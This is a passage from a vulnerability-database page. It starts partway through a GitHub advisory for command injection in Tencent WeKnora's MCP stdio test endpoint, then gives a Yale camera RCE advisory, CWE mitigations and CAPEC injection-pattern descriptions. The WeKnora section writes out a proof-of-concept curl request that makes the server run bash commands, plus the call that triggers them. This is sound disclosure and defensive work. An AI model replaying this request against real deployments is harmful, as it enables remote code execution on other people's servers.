src=\"https://github.com/user-attachments/assets/4e588f20-9371-4dc3-b585-def2cd752497\" /\u003e\n    \n    \u003cimg width=\"1679\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a372981c-dc4c-40e9-a9af-4d27fd36251a\" /\u003e\n    \n- **POST to\u00a0/api/v1/mcp-services\u00a0with\u00a0transport_type=stdio\u00a0and\u00a0stdio_config\u00a0to\u00a0define the command and arguments to be executed on the server.**\n    \n    ```bash\n    CREATE_RES=\"$(curl -sS -X POST \"$API/api/v1/mcp-services\" \\\n      -H \"Authorization: Bearer $TOKEN\" \\\n      -H \"Content-Type: application/json\" \\\n      -d \u0027{\n        \"name\":\"rce\",\n        \"description\":\"rce\",\n        \"enabled\":true,\n        \"transport_type\":\"stdio\",\n        \"stdio_config\":{\"command\":\"bash\",\"args\":[\"-lc\",\"id \u003e /tmp/RCE_ok.txt \u0026\u0026 uname -a \u003e\u003e /tmp/RCE_ok.txt\"]},\n        \"env_vars\":{}\n      }\u0027)\"\n      \n    MCP_ID=\"$(echo \"$CREATE_RES\" | jq -r \u0027.data.id // empty\u0027)\"\n    echo \"MCP_ID=$MCP_ID\"\n    ```\n    \n    \u003cimg width=\"1296\" height=\"354\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d109dd4e-d051-46e3-bdcc-4d1a181d1635\" /\u003e\n    \n- **Invoke\u00a0/api/v1/mcp-services/{id}/test\u00a0to trigger\u00a0Connect(), causing execution of the stdio subprocess.**\n    \n    ```bash\n    curl -sS -X POST \"$API/api/v1/mcp-services/$MCP_ID/test\" \\\n      -H \"Authorization: Bearer $TOKEN\" | jq .\n    ```\n    \n    \u003cimg width=\"1270\" height=\"217\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2723ef39-f6b8-4478-b60e-5b6a4e667a1e\" /\u003e\n    \n- **Post-exploitation verification (container state)**\n    \n    ```bash\n    ls -l\n    ```\n    \n    \u003cimg width=\"1243\" height=\"221\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5f78f83a-64e2-4a0a-95c4-6832f606fbcd\" /\u003e\n    \n\n### Impact\n\n---\n\n- **Remote\u00a0Code Execution (RCE)**: Arbitrary command execution enables file creation/modification, execution of\u00a0additional payloads, and service disruption\n- **Information Disclosure**: Sensitive data exfiltration through reading environment variables, configuration files, keys, tokens, and local\u00a0files\n- **Privilege\u00a0Escalation/Lateral\u00a0Movement (Environment-Dependent)**: Impact may\u00a0escalate based on container mounts, network policies, and internal service access permissions\n- **Cross-Tenant\u00a0Boundary Impact**: Execution occurs in a\u00a0shared backend runtime; depending on deployment configuration, impact may extend beyond tenant boundaries (**exact scope is uncertain**\u00a0and varies by deployment setup)",
  "id": "GHSA-78h3-63c4-5fqc",
  "modified": "2026-01-22T16:29:34Z",
  "published": "2026-01-09T19:21:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22688"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Tencent/WeKnora"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-4292"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WeKnora has Command\u00a0Injection\u00a0in\u00a0MCP stdio\u00a0test"
}

GHSA-78JH-XP49-WR6H

Vulnerability from github – Published: 2022-05-24 17:40 – Updated: 2024-03-21 03:33
VLAI
Details

The Yale WIPC-303W 2.21 through 2.31 camera is vulnerable to remote command execution (RCE) through command injection via the HTTP API.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-23826"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-01-26T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "The Yale WIPC-303W 2.21 through 2.31 camera is vulnerable to remote command execution (RCE) through command injection via the HTTP API.",
  "id": "GHSA-78jh-xp49-wr6h",
  "modified": "2024-03-21T03:33:59Z",
  "published": "2022-05-24T17:40:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23826"
    },
    {
      "type": "WEB",
      "url": "https://firedome.io/blog/firedome-discloses-0-day-vulnerabilities-in-yale-ip-cameras"
    },
    {
      "type": "WEB",
      "url": "https://lp.firedome.io/hubfs/Yale%20WIPC-301W%20RCE%20Vulnerability%20Report%205-6.pdf"
    },
    {
      "type": "WEB",
      "url": "https://whiterosezex.blogspot.com/2021/01/cve-2020-23826-rce-vulnerability-in.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

If at all possible, use library calls rather than external processes to recreate the desired functionality.

Mitigation
Implementation

If possible, ensure that all external commands called from the program are statically created.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
Operation

Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands.

Mitigation
System Configuration

Assign permissions that prevent the user from accessing/opening privileged files.

CAPEC-136: LDAP Injection

An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-183: IMAP/SMTP Command Injection

An adversary exploits weaknesses in input validation on web-mail servers to execute commands on the IMAP/SMTP server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.

CAPEC-248: Command Injection

An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.

CAPEC-40: Manipulating Writeable Terminal Devices

This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-75: Manipulating Writeable Configuration Files

Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.